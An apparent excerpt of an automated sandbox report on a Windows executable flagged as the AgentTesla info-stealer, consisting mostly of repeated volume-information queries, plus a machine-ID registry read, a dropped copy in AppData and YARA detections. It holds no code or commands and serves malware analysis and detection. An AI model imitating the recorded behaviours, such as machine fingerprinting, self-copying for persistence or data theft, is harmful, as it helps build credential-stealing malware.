Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Users\user\Desktop\iNFGd6bDZX.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE
